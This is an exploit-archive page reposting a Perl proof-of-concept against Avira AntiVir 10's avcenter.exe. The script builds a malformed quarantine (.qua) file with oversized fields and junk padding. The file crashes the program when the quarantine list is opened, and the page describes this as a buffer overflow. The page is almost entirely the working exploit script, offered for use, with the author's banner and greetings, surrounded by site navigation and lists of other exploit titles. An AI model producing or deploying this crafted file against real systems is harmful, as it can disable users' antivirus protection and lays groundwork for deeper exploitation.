首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Avira AntVir QUA file in (avcenter.exe) Local Crash PoC
来源:Ked-h@hotmail.com 作者:KedAns-Dz 发布时间:2011-02-21  
#!/usr/bin/perl
#================================================================================= |               
#| # Title    : Avira AntVir QUA file in ( avcenter.exe) Local Crash PoC                                            |
#| # Author   : KedAns-Dz                                                                                                                         |
#| # email    : Ked-h@hotmail.com                                                                                                            |
#| # Home     : HMD/AM (30500/04300) - Algeria -(00213555248701)                                         |
#| # Web Site : /(~_-)\ ...                                                                                                                        |
#| # Tested on : windows XP SP3 Français & Arabic                                                                             |
#| # Target SFW : Avira Anti Virus Version 10.00.12.28                                                                     |
#| # Info : Copy the QUA file in :                                                                                                         |
#          ..\..\All Users\Application Data\Avira\AntiVir Desktop\INFECTED                                     |
#    > You are Opening The avcenter.exe and show Quarantine list                                                     |
#                          the avcenter is Task kill and Show Crash Error                                                         |
#======================      Exploit By KedAns-Dz       =================================  |
# Perl File  :
#----------------------------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n".                 
      "      ||========================================||\n".
   "      ||                                        ||\n".
   "      ||   Avira AntVir Local Crash PoC         ||\n".
   "      ||      Exploit Buffer Overflow           ||\n".
   "      ||    Created BY KedAns-Dz                ||\n".
   "      ||   ked-h(at)hotmail(dot)com             ||\n".
   "      ||                                        ||\n".
   "      ||========================================||\n\n\n";
sleep(2);
print "\n";
my $Buf =
"\x41\x6e\x74\x69\x56\x69\x72\x20\x51\x75\x61\x00\x00\x00\x00\x00".
"\x46\x01\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00".
"\x00\x00\x00\x00\x28\x00\x00\x02\x00\x00\x0e\x04\x69\x4c\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x02\x00".
"\x00\x07\x00\x00\x00\x42".
"\x00" x 51 .
"\x4b\x65\x64\x40\x41\x6e\x73\x2f\x41\x76\x32\x42\x6f\x46\x2e\x50\x6c\x7c". # Infected Name
"\x31" x 378 . # Bad Multi Number
"\x00" x 48 .
"\x5c\x00\x5c\x00\x3f\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x4b\x00\x2e\x00\x44\x00\x7a" . # Path V-Qua
"\x41" x 380 ; # Junk
$file = "4fkedans.qua";
open (F ,">$file");
print F $Buf;
sleep (2);
print "\n Creat File : $file , Succesfully ! \n";
close (F);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================|
#[»] Team :  [D] HaCkerS-StreeT-Team [Z] > Algerians Hackers <                 |
# Greetz : Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride * Massinhou-Dz |
# Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED * all my friends ..    |
#------------------------------------------------------------------------------|
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Novell Iprint LPD Remote Code
·JAKCMS <= v2.01 Code Execution
·Novell ZenWorks 10 & 11 TFTPD
·JAKCMS <= v2.01 RC1 Blind SQL
·Mozilla Firefox Interleaving d
·IBM Lotus Domino LDAP Bind Req
·BEES企业网站管理系统 v1.6后台
·JAKCMS <= v2.01 RC1 Blind SQL
·天天团购后台Getshell安全问题
·WinMerge v2.12.4 Project File
·Solar FTP 2.1 Denial of Servic
·Microsoft Internet Explorer "A
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved